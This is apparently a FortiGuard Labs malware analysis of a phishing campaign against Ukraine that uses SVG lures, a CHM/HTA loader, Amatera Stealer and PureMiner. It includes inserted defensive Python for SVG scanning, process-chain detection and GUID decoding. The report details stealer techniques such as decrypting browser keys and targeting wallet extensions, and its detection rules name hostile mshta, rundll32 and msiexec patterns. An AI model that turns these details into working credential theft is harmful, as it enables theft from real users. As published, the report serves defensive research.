SVG Phishing hits Ukraine with Amatera Stealer, PureMiner
FortiGuard Labs discovered a phishing campaign impersonating Ukrainian government agencies that distributes malware such as Amatera Stealer and PureMiner through malicious SVG files. The attackers use the SVG files to lure victims into downloading and executing malicious code, ultimately stealing sensitive information and hijacking computing resources. 2025-9-26 13:0:0 Author: feeds.fortinet.com

Affected platforms: Microsoft Windows
Impacted parties: Any organization
Impact: Remote control of the victim’s device to collect sensitive information, hijack computing resources, and deliver additional malware
Severity level: High

FortiGuard Labs recently observed a phishing campaign designed to impersonate Ukrainian government agencies and deliver additional malware to targeted systems. The phishing emails contain malicious Scalable Vector Graphics (SVG) files designed to trick recipients into opening harmful attachments.

When opened, the SVG initiates the download of a password-protected archive that contains a Compiled HTML Help (CHM) file. This CHM file triggers a chain of malicious actions through an HTML Application (HTA) CountLoader, ultimately installing multiple types of malware on the victim’s machine.

In this campaign, Amatera Stealer and PureMiner were deployed as fileless threats. They were executed via .NET Ahead-of-Time (AOT) compilation with process hollowing or loaded directly into memory using PythonMemoryModule, which delivered the final payload.

This blog details how the malware is delivered and provides an analysis of Amatera Stealer and PureMiner, which were both used in the campaign.

Initial Access

The phishing campaign begins with a forged email claiming to be a notice from the National Police of Ukraine. The email includes a malicious SVG attachment (Figure 2). The message states that an appeal has been submitted for review and warns that ignoring the notice could lead to further legal action. The text is generic but uses formal, legal-sounding language to pressure recipients into opening the attachment.

Figure 2: The phishing email

The attachment, named “elektronni_zapit_NPU.svg,” contains an embedded HTML <iframe> element that references an external SVG resource (Figure 3).

Figure 3: Malicious SVG file

When the second SVG loads, it displays a spoofed Adobe Reader interface with the message “Please wait, your document is loading...” (in Ukrainian). It then automatically redirects the victim to a download page, retrieves a password-protected archive, and displays the password for extracting it (Figure 4).

Figure 4: Spoofed Adobe Reader interface
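The attachment works because an SVG can carry HTML-type content (here a <foreignObject> wrapping an <iframe> that points at a remote resource). As an added illustration that is not part of the original report, the following Python check flags exactly those properties in an SVG file before it is rendered; the sample SVG is constructed and the URL is a placeholder.

```python
import xml.etree.ElementTree as ET
from typing import List

# Elements that turn an SVG into an executable document rather than an image.
ACTIVE_ELEMENTS = {"script", "iframe", "foreignobject", "object", "embed"}
# Attributes whose value is a URL that can pull in a remote resource.
URL_ATTRS = {"href", "src", "data"}

def _local(name: str) -> str:
    """Strip an XML namespace, e.g. {http://www.w3.org/1999/xhtml}iframe -> iframe."""
    return name.rsplit("}", 1)[-1].lower()

def scan_svg(svg_text: str) -> List[str]:
    """Return human-readable findings for active content and external references."""
    findings: List[str] = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return [f"not well-formed XML ({exc}); treat as suspicious"]
    for elem in root.iter():
        tag = _local(elem.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"active element <{tag}>")
        for attr, value in elem.attrib.items():
            name = _local(attr)
            if name.startswith("on"):  # onload, onclick, ... inline script handlers
                findings.append(f"event handler {name} on <{tag}>")
            if name in URL_ATTRS and value.lower().startswith(("http://", "https://", "//")):
                findings.append(f"external reference in <{tag}> {name}={value}")
    return findings

def is_suspicious(svg_text: str) -> bool:
    return bool(scan_svg(svg_text))

# Constructed sample modelled on the attachment described above (not the real file).
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xhtml="http://www.w3.org/1999/xhtml"
     width="800" height="600">
  <foreignObject width="100%" height="100%">
    <xhtml:iframe src="https://example.invalid/stage2.svg" width="100%" height="100%"/>
  </foreignObject>
</svg>"""

# A plain image-only SVG for comparison.
CLEAN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4"/></svg>'

if __name__ == "__main__":
    for finding in scan_svg(SAMPLE_SVG):
        print(finding)
```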

The downloaded archive contains a Compiled HTML Help (CHM) file. Inside the CHM, investigators found a malicious HTML file containing a shortcut object (Figure 5). The object’s Click method runs a command that executes a remote HTML Application (HTA) resource in hidden mode.

Figure 5: Malicious HTM file extracted from the CHM

CountLoader

Although an HTA file functions much like a standard web page, it also has the ability to access ActiveX controls. In this case, the code is deliberately obfuscated using string encoding and array shuffling to conceal its purpose (Figure 6).

Figure 6: Pre-deobfuscation and post-deobfuscation versions of the code

The script’s primary role is to establish a connection with a remote server and wait for the next stage of the payload. Once the connection is made, the malware collects information from the victim’s system and sends it in an HTTP POST request, using XorBase64 encoding. Afterward, the loader sends an encoded getUpdates message to retrieve additional commands from the server (Figure 7).

Figure 7: Core routine of the CountLoader

The decoded response message follows the format shown below.

[{"id":{ID},"url":"{URL}","taskType":{COMMAND ID}}]

The loader supports six commands that allow it to download and execute payloads in multiple formats, perform domain reconnaissance, and remove traces of activity:
Command ID  Details
1           Download a file to the %userprofile%\Music\ directory and execute it.
2           Download and extract an archive. Run run.py with pythontest.exe if present; otherwise, run the matching .exe file.
3           Download a DLL to the %userprofile%\Music\ directory and execute it with rundll32.
4           Delete the task.
5           Collect domain information such as group listings, domain trusts, and admin/computer membership. Send both the commands and their outputs to the remote server.
6           Download an MSI file to the %userprofile%\Music\ directory and execute it with msiexec.exe.

Table 1: Supported commands
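The chain described so far (CHM viewer launching a remote HTA, then payloads dropped under %userprofile%\Music\ and started directly, via rundll32, via msiexec.exe, or as run.py under pythontest.exe) leaves a recognisable pattern in process-creation telemetry. The following triage script is an added example, not part of the original analysis; the event lines are constructed and the paths and file names are invented.

```python
from typing import Dict, List

# Constructed sample process-creation events, one per line:
# parent image | image | command line. Paths and file names are invented.
SAMPLE_EVENTS = """\
C:\\Windows\\hh.exe|C:\\Windows\\System32\\mshta.exe|mshta https://example.invalid/stage.hta
C:\\Windows\\System32\\mshta.exe|C:\\Users\\u\\Music\\update.exe|"C:\\Users\\u\\Music\\update.exe"
C:\\Windows\\System32\\mshta.exe|C:\\Windows\\System32\\rundll32.exe|rundll32 C:\\Users\\u\\Music\\lib.dll,Start
C:\\Windows\\System32\\mshta.exe|C:\\Windows\\System32\\msiexec.exe|msiexec /i C:\\Users\\u\\Music\\pkg.msi /qn
C:\\Windows\\System32\\mshta.exe|C:\\Users\\u\\Music\\ergo\\pythontest.exe|pythontest.exe run.py
C:\\Windows\\explorer.exe|C:\\Program Files\\App\\app.exe|app.exe
"""

def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(parent: str, image: str, cmd: str) -> List[str]:
    """Return the CountLoader-chain behaviours one event matches (empty list if none)."""
    p, i, c = _basename(parent), _basename(image), cmd.lower()
    hits: List[str] = []
    if p == "hh.exe" and i == "mshta.exe":
        hits.append("CHM viewer spawned mshta.exe (shortcut object running a remote HTA)")
    if i == "mshta.exe" and ("http://" in c or "https://" in c):
        hits.append("mshta.exe given a remote HTA URL")
    if "\\music\\" in image.lower():
        hits.append("executable started from %userprofile%\\Music (tasks 1 and 2)")
    if i in ("rundll32.exe", "msiexec.exe") and "\\music\\" in c:
        hits.append(f"{i} loading a payload from %userprofile%\\Music (tasks 3 and 6)")
    if i == "pythontest.exe" and "run.py" in c:
        hits.append("pythontest.exe executing run.py (task 2)")
    return hits

def triage(events_text: str) -> Dict[int, List[str]]:
    """Map each suspicious event's 0-based line number to the behaviours it matched."""
    results: Dict[int, List[str]] = {}
    for n, line in enumerate(events_text.splitlines()):
        if not line.strip():
            continue
        parent, image, cmd = line.split("|", 2)
        hits = classify(parent, image, cmd)
        if hits:
            results[n] = hits
    return results

if __name__ == "__main__":
    for n, hits in triage(SAMPLE_EVENTS).items():
        print(n, "; ".join(hits))
```

Real telemetry will also show the password-protected archive being extracted and the CHM opened from a mail client; the rules above only cover what the loader itself does.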

In this campaign, the loader was used to deliver both Amatera Stealer and PureMiner. A related, more recent campaign delivered only Amatera Stealer, but with stronger obfuscation techniques during the delivery stage.

The following section examines the two downloaded ZIP archives and their payloads.

ergosystem.zip to PureMiner

The downloaded ZIP archive, ergosystem.zip, contains one executable file and multiple DLL libraries (Figure 8). In this stage, DLL sideloading is used: a trusted executable loads a malicious DLL. The payload is implemented in .NET and uses Ahead-of-Time (AOT) compilation.

Figure 8: Files in the ergosystem.zip archive

The payload is initially stored in encrypted form within the .rdata section. It is decrypted and then injected into a newly created .NET Framework tool process using process hollowing. This allows the payload to run under the guise of a legitimate process.

The decrypted payload has been identified as PureMiner, a stealthy .NET cryptominer. PureMiner collects system information—particularly video adapter specifications and usage details—and can deploy CPU-based or GPU-based mining modules depending on the attacker’s configuration.

Figure 9: Latest PureMiner product image found on PureCoder’s website.

Like other members of the Pure malware family, when the executable runs, it decrypts and decompresses its embedded data before loading it into memory. The first element parsed is the Protobuf-serialized configuration, which enables features such as hardware checks, process injection, and retrieval of Command and Control (C2) information (Figure 10).

Figure 10: Main function and configuration.

To collect hardware specifications, PureMiner uses APIs from the AMD Display Library (atiadlxx.dll / atiadlxy.dll) and NVIDIA library (nvapi.dll / nvapi64.dll). These APIs return details about total memory, available memory, and memory currently in use (Figure 11). It can also query video adapter information directly from the system registry (Figure 12). Before mining begins, the malware verifies that the target system has at least 4 GB of memory.

Figure 11: Adapter details retrieved from AMD/NVIDIA libraries

Figure 12: Adapter details retrieved from the registry

Once initialization is complete and the process name is verified, the malware connects to its C2 server, sends the victim’s information in serialized form, and waits for further serialized commands. All communication is encrypted with 3DES (Figure 13).

Figure 13: Information sent to the C2 server

Depending on the received instructions, PureMiner can:

  • Save and execute a downloaded payload
  • Remove persistence
  • Monitor whether analysis tools (e.g., Task Manager, SystemInformer, Process Hacker, Process Explorer, Perfmon) are running
  • Check the active window
  • Detect whether the system is idle

smtpB.zip to Stealer

Another ZIP archive, smtpB.zip, contains a Python interpreter, supporting modules, and a malicious Python script (Figure 14). This script functions as a downloader, loading the payload directly into memory without writing it to disk. To achieve this, it uses the PythonMemoryModule project from GitHub.

Figure 14: Malicious Python file

Amatera Stealer

When executed, the payload—identified as Amatera Stealer—creates a mutex with hardcoded values. It then connects to a remote server and issues a GET request to the /core/createSession endpoint to obtain a configuration file. This configuration is Base64-decoded, decrypted with the RC4 algorithm, and passed into a parsing routine that controls the data harvesting process (Figure 15).

Figure 15: Code responsible for fetching and parsing the configuration

The parsing routine begins by identifying the type of data to collect and then routes processing to the appropriate parsing flow (Figure 16).

In addition to category-based parsing, the malware also operates in a mode where it collects and transmits data immediately. In this mode, each data category is sent via separate HTTP POST requests to the /core/sendPart endpoint (Figure 17). This results in multiple POST requests during the infection phase.

Figure 17: ‘system_info’ category includes build ID ‘smtp_spam_2’

During monitoring of a similar campaign, researchers found the same malware variant using a different build ID, smtp_test_4. The following analysis is based on the configuration retrieved from that variant (Figure 18).

Figure 18: Decrypted configuration data

System Information

Amatera Stealer first gathers basic system information, including:

  • Computer name
  • Username
  • Operating system name
  • User locale settings
  • Time zone details
  • Machine GUID
  • OS installation date

It also collects hardware details such as the video card name, processor model, and total physical memory.

Beyond basic system data, the malware targets additional information:

  • Program execution paths
  • Active processes
  • Installed software

To provide further visibility into the victim’s system, it captures a screenshot and retrieves clipboard contents.

Gecko-based Application

In this module, Amatera Stealer uses configuration data—gecko_paths and gecko_files—to locate directories and files associated with Gecko-based applications. It then appends the /Profiles path to access sensitive files such as:

  • key4.db
  • logins.json
  • cookies.sqlite
  • formhistory.sqlite

The following applications are targeted:

  • Browser: Firefox, Waterfox, LibreWolf, Pale Moon, Basilisk, IceDragon, Centaury, Wyzo, Cliqz, Cyberfox, BlackHawk Browser, GNU IceCat, Netscape Navigator
  • Browser Suite (browser, email, IRC, editor): SeaMonkey
  • Chat Client: Instantbird
  • Email Client: Thunderbird
  • Web Media Player: Songbird

Chromium-based Application

For Chromium-based applications, the malware relies on configuration parameters—chromium_browsers, chromium_files, chromium_extensions, and chromium_apps. These values specify which browsers and applications to target, identify their directory paths, locate browser extension data, and define which files to collect.

The stealer uses two techniques to extract sensitive data:

  1. Legacy Cookie Decryption
    • Extracts the encrypted_key from the Local State file.
    • Decodes it from Base64 and verifies it begins with DPAPI.
    • Decrypts the key using the CryptUnprotectData function.
    • Uses the decrypted key to access protected files.
  2. App-Bound Encrypted (ABE) Data Decryption
    • Locates the app_bound_encrypted_key in the Local State file.
    • Injects shellcode into the browser process.
    • Leverages COM APIs with the provided CLSID and IID to instantiate a COM object tied to the browser’s Elevation Service.
    • Calls the object’s DecryptData method to retrieve the decrypted app-bound key (Figure 19).

Figure 19: Calling the DecryptData method.

An example configuration entry for Chrome shows the structure (simplified):

Category: chromium_browsers

Value                                                   Meaning
%localappdata%\Google\Chrome\User Data                  Path for collecting sensitive files
%programfiles%\Google\Chrome\Application\chrome.exe     Target browser path
chrome.exe                                              Target browser
1887985888:63041:17937:136:149:125:134:125:211:103:91   CLSID
1178255055:16653:16511:138:245:13:243:90:0:92:200       IID
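The CLSID and IID above are stored as eleven colon-separated decimal integers rather than as GUID text. The following helper is an added example, not code from the original analysis: it converts that encoding to canonical GUID form so the values can be compared with the browser's published Elevation Service identifiers, and back again. It assumes the fields follow the Windows GUID structure (32-bit Data1, 16-bit Data2 and Data3, eight Data4 bytes), which the sample values are consistent with.

```python
import struct
import uuid

def decode_config_guid(value: str) -> str:
    """Turn a colon-separated decimal GUID from the stealer config into canonical text.

    Assumed field layout (the Windows GUID structure): one 32-bit Data1, two 16-bit
    Data2/Data3 values, then the eight Data4 bytes, each written as a decimal integer.
    """
    fields = [int(part) for part in value.split(":")]
    if len(fields) != 11:
        raise ValueError(f"expected 11 fields, got {len(fields)}")
    data1, data2, data3, *data4 = fields
    if not (0 <= data1 <= 0xFFFFFFFF and all(0 <= x <= 0xFFFF for x in (data2, data3))
            and all(0 <= b <= 0xFF for b in data4)):
        raise ValueError("GUID field out of range")
    # uuid.UUID expects the 16 bytes in big-endian (network) order.
    raw = struct.pack(">IHH8B", data1, data2, data3, *data4)
    return str(uuid.UUID(bytes=raw)).upper()

def encode_config_guid(text: str) -> str:
    """Inverse of decode_config_guid: canonical GUID text back to the config encoding."""
    raw = uuid.UUID(text).bytes
    data1, data2, data3, *data4 = struct.unpack(">IHH8B", raw)
    return ":".join(str(x) for x in (data1, data2, data3, *data4))

# The two values from the configuration sample in the text.
SAMPLE_CLSID = "1887985888:63041:17937:136:149:125:134:125:211:103:91"
SAMPLE_IID = "1178255055:16653:16511:138:245:13:243:90:0:92:200"

if __name__ == "__main__":
    print("CLSID", decode_config_guid(SAMPLE_CLSID))
    print("IID  ", decode_config_guid(SAMPLE_IID))
```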

The following targets are defined according to the received configuration:

  • Browsers: Chrome, Edge, Brave
  • Target files: Login Data, Web Data, and Network\Cookies
  • Extensions:
    • Station Wallet     aiifbnbfobpmeekipheeijimdpnlpgpp
    • Trust Wallet     egjidjbpglichdcondbcbdnbeeppgdph
    • MathWallet     afbcbjpbpfadlkmhmclhkeeodmamcflc
    • Coin98 Wallet     aeachknmefphepccionboohckonoeemg
    • MetaMask     nkbihfbeogaeaoehlefnkodbefgpgknn
    • Coinbase Wallet     hnfanknocfeofbddgcijnmhnfnkdnaad
    • BNB Chain Wallet     fhbohimaelbohpjbbldcngcnapndodjp
    • Phantom Wallet     bfnaelmomeimhlpmgjnjophhpkkoljpa
    • Ronin Wallet     fnjhmkhhmkbjkkabndcnnogagogbneec
    • TronLink     ibnejdfjmmkpcnlpebklmnkoeoihofec
    • Keplr     dmkamcknogkgcdfhhbddcghachkejeap
  • Applications: Binance, Discord

Applications

In addition to the applications listed in the configuration file, Amatera Stealer contains two hardcoded routines for extracting data from Steam and Telegram (Figure 20).

Figure 20: Application gathering module

  • Steam:
    The malware locates the Steam installation path in the registry under:
    HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Valve\Steam
    It then searches for *.vdf files in the installation directory to extract saved information.
  • Telegram:
    The malware searches %appdata%\Telegram Desktop\tdata and collects the following files:
    • Dump
    • Webview
    • Emoji
    • Tdummy
    • Temp
    • user_data

The configuration also specifies additional applications for data theft, including:

  • FileZilla: Collects connection settings from recentservers.xml in %appdata%\FileZilla
  • AnyDesk: Collects configuration files (*.conf) from %appdata%\AnyDesk

Desktop Wallets

This module is designed to steal data from desktop cryptocurrency wallets. The configuration specifies the target path, target filename, and a Boolean flag.

  • If the flag is true, the malware performs a recursive file search up to five directory levels deep.
  • If the flag is false, it constructs the file path directly by combining the target path and filename.

Targeted Desktop Wallets include: Sparrow, BitcoinCore, DashCore, LitecoinCore, DogecoinCore, Coinomi, Electrum, Qtum, Exodus, Armory, ElectrumLTC, Atomic, WasabiWallet, ElectronCash

File Grabber

The file grabber module collects files according to the grabber_rules defined in the configuration. Each rule consists of four elements, shown here with the values from the sample configuration:

Category: grabber_rules

Value                  Meaning
%userprofile%\Desktop  Target path
*.txt                  Target file pattern
10                     File size limit in megabytes
3                      Directory search depth

In this configuration, the module retrieves files with the following extensions from the Desktop: *.txt, *.pdf, *.doc, *.docx, *.xls, *.xlsx, *.html, *.hta, *.png, *.jpg, *.jpeg, *.bmp, and *.svg.

Figure 21: C2 Sign-in page for Amatera Stealer.

Conclusion

This phishing campaign demonstrates how a malicious SVG file can act as an HTML substitute to initiate an infection chain. In this case, attackers targeted Ukrainian government entities with emails containing SVG attachments. The SVG-embedded HTML code redirected victims to a download site.

The downloaded CHM file contained a shortcut object that executed a remote HTA file. This loader was then used to deliver malware payloads to the victim’s system.

Two ZIP archives were downloaded, each ultimately delivering its payload in a fileless manner. Analysis confirmed that Amatera Stealer and PureMiner were deployed in this campaign.

  • Amatera Stealer was used to harvest extensive information from infected systems, including credentials, system data, application data, browser files, and cryptocurrency wallets.
  • PureMiner was used to collect adapter-specific hardware information and monitor system activity, allowing attackers to deploy CPU or GPU mining modules for maximum efficiency.

Together, these payloads enabled both data theft and resource hijacking in the targeted environment.

Fortinet Protections

The malware described in this report is detected and blocked by FortiGuard Antivirus as:

HTML/Phish.09F5!tr
HTML/Phish.7F92!tr
HLP/Agent.G2!tr
HTA/Agent.38f7!tr
W64/GenKryptik.HFPH!tr
MSIL/Agent.6751!tr
Python/Agent.3F5C!tr.dldr
W64/Agent_AGen.DOB!tr

FortiGate, FortiMail, FortiClient, and FortiEDR all integrate the FortiGuard Antivirus Service, which ensures customers with up-to-date protections are safeguarded against these threats.

FortiMail recognizes the phishing email as “virus detected.” In addition, real-time anti-phishing provided by FortiSandbox embedded in Fortinet’s FortiMail, web filtering, and antivirus solutions provides advanced protection against both known and unknown phishing attempts.

Additionally,

  • The FortiGuard CDR (Content Disarm and Reconstruction) service can neutralize malicious macros embedded in documents.
  • Organizations are encouraged to take the free Fortinet Certified Fundamentals (FCF) cybersecurity training, which introduces today’s threat landscape and core security concepts.
  • The FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks attacks by leveraging intelligence from Fortinet’s global network of sensors, CERTs, MITRE, industry partners, and other collaborative sources.

If you believe this or any other cybersecurity threat has impacted your organization, contact the Global FortiGuard Incident Response Team.

IOCs

Domains / IPs:


Files (SHA-256 Hashes):
Source: https://feeds.fortinet.com/~/925395818/0/fortinet/blog/threat-research~SVG-Phishing-hits-Ukraine-with-Amatera-Stealer-PureMiner